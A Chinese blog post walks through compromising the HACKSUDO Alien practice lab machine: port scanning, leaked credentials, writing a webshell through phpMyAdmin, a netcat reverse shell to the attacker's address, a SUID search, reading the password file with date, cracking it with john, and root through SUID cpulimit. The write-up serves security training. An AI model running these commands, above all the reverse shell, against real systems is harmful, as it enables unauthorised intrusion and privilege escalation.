vulhub靶机--HACKSUDO Alien

最新推荐文章于 2023-07-21 17:39:16 发布
最新推荐文章于 2023-07-21 17:39:16 发布
阅读量242 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58595840/article/details/128738002
版权

1、环境介绍

kali攻击机:192.168.1.128
靶机:192.168.1.1271

2、信息收集

2.1、nmap扫描

开启80、22、9000端口

2.2、目录扫描

进入backup目录,发现敏感数据

3、渗透测试

使用发现的用户名和密码登录phpmyadmin数据库

 

执行下面sql语句查看secure_file_priv的值看看可不可以写入shell ,为空表示可读可写

show global variables like '%secure%';

显示为空,可以写入webshell

使用蚁剑进行连接,尝试反弹shell均失败了,这里使用webshell使用nc反弹shell成功

 使用nc反弹shell

nc -e /bin/bash 192.168.1.128 4444
nc -lvp 4444

 

反弹shell成功,并且查找具有root权限的suid文件,进行SUID提权

find / -perm -u=s -type f 2>/dev/null

到这个网站GTFOBins查看date含义,它可以对文件进行读取不受全权限控制

我们尝试使用date读取用户密码文件

将密文放置在txt文件中,使用john工具进行密码破解,破解 出了hacksudo用户的密码为aliens

进入hacksudo用户,并寻找具有root权限suid文件,进行suid提权

到上面发的那个网站查看cpulimit

切换到Downloads目录执行语句进行提权

提权成功 ,对flag进行读取

 

karry_test
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub靶机Billu_b0x
千寻的博客
07-21 514
文章目录第一部分 靶机说明靶机地址靶机说明目标环境搭建第二部分 信息收集第一步 主机扫描第二步 端口扫描第三步 访问80端口第三部分 漏洞查找和文件包含利用漏洞挖掘思路第一步 扫描目录第二步 访问 /add第三步 访问test第四步 尝试文件包含第五步 使用post方法读取文件,进行代码审计第六步 in.php文件第七步 使用密码登陆数据库第四部分 通过文件上传获取shell第一步 登陆web界面第二步代码审计第三步 查看图片,存在目录浏览第四步 文件上传第五步 上传cmd命令来执行图片马第六步 cmd的利
vulhub-master.zip
06-10
Vulhub是一个面向广大安全研究者和爱好者的开源项目,其主要目的是提供一系列的安全漏洞靶场环境。这个项目名为“vulhub-master.zip”的压缩包,包含了一个2020年6月10日更新的Vulhub完整版本。Vulhub的设计理念是...
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5434
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub靶机
weixin_43902100的博客
09-21 640
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
VulnHub靶机-SkyTower
Slow_的博客
02-26 635
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
Vulnhub靶机 Lampiao
菜浪马废的博客
04-28 544
找到登录页面 cms:drupal7 可以爆破用户名 先找一下漏洞试试 伐克 尝试了半天 发现版本是7.54 用了半天7.0-7.31的 找到mysql的账号 三个账号 没能解密任何一个 试一下ssh 失败了 root就在你眼前 就是没法提权的感觉 太酸爽了 有一个用户tiago ssh爆破 我*********他 密码是这个?????? 我********* $...
安装vulhub靶机过程
05-03
安装vulhub靶机过程 在网络安全领域中,安装vulhub靶机是一个非常重要的步骤。Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版是一个用于网络安全教育和练习的平台,主要针对Web应用程序的安全漏洞。DVWA(Damn Vulnerable Web Application)是一个开源的Web应用,设计用来帮助安全专业人员测试他们的技能,以及让开发者更...
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4295
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2142
Vulnhub DC-1、DC-2靶机通关手册
vulhub靶机maEnuBox渗透
qq_56666960的博客
02-07 2492
靶机EnuBox_mattermost渗透
vulnhub靶机-sunset:dawn
臭nana的博客
07-16 1094
1、找到靶机ip:192.168.0.123 nmap 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.123 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.123 Host is up (0.0090s latency). Not shown: 65531 closed ports PORT STATE SERV
Vulhub靶机合集
最新发布
Aiwin的博客
07-21 611
Vulhub靶机合集(持续记录)
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4577
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
vulhub靶机joker渗透
qq_56666960的博客
02-07 2914
vulhub靶机joker渗透
Vulnhub靶机实战-Forensics
黑白的博客
01-18 1477
声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,很简单的两个端口 访问80 http://192.168.31.152 点一下右上角的get flag,真骚气 网站上图片好多呀,邮件查看源代码,发现images目录,访问一下 把这些图片都下载下来,看看fingerprint这个指纹
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2968
Vulnhub靶机渗透学习——DC-9
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值